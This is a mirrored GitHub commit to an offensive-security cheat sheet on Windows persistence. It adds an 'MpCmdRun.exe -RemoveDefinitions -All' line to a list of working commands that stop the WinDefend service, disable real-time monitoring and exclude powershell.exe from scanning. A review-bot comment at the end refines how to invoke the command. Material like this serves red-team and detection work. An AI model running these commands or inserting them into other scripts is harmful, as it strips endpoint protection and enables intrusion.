mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Update Windows - Persistence.md
Add example to `disable windows defender` which uses MpCmdRun.exe to reset the current definitions. I recently used this and it was sufficient: Defender did not recognize previously flagged malicious files. It is quite helpful in case Set-MpPreference is not present or the attacker is not allowed to adjust the service.
This commit is contained in:
parent
45821c00ea
commit
6584df310f
1 changed file with 5 additions and 1 deletion
|
@ -51,6 +51,10 @@ sc config WinDefend start= disabled
|
||||||
sc stop WinDefend
|
sc stop WinDefend
|
||||||
Set-MpPreference -DisableRealtimeMonitoring $true
|
Set-MpPreference -DisableRealtimeMonitoring $true
|
||||||
|
|
||||||
|
# Wipe currently stored definitions
|
||||||
|
# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
|
||||||
|
MpCmdRun.exe -RemoveDefinitions -All
|
||||||
|
|
||||||
## Exclude a process / location
|
## Exclude a process / location
|
||||||
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
||||||
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
|
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
|
||||||
|
|
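Review bot: the added `MpCmdRun.exe -RemoveDefinitions -All` line is invoked bare, while the comment just above it locates the binary under `C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>`; that directory is not on PATH and its path contains spaces, so the example should either quote the full path or change into that directory first, e.g. `cd "C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>"` before the call (or replace the `<antimalware platform version>` placeholder with a note that it is the versioned subfolder present on the host). The section would also benefit from two caveats that the commit message implies but the text omits: removing definitions is an elevated operation, so it does not sidestep the privilege requirement of the `Set-MpPreference` / `sc` lines above it, and the effect lasts only until the next signature update re-downloads definitions, which is the window a defender watching Defender's update events or a sudden drop in engine/signature version would look for.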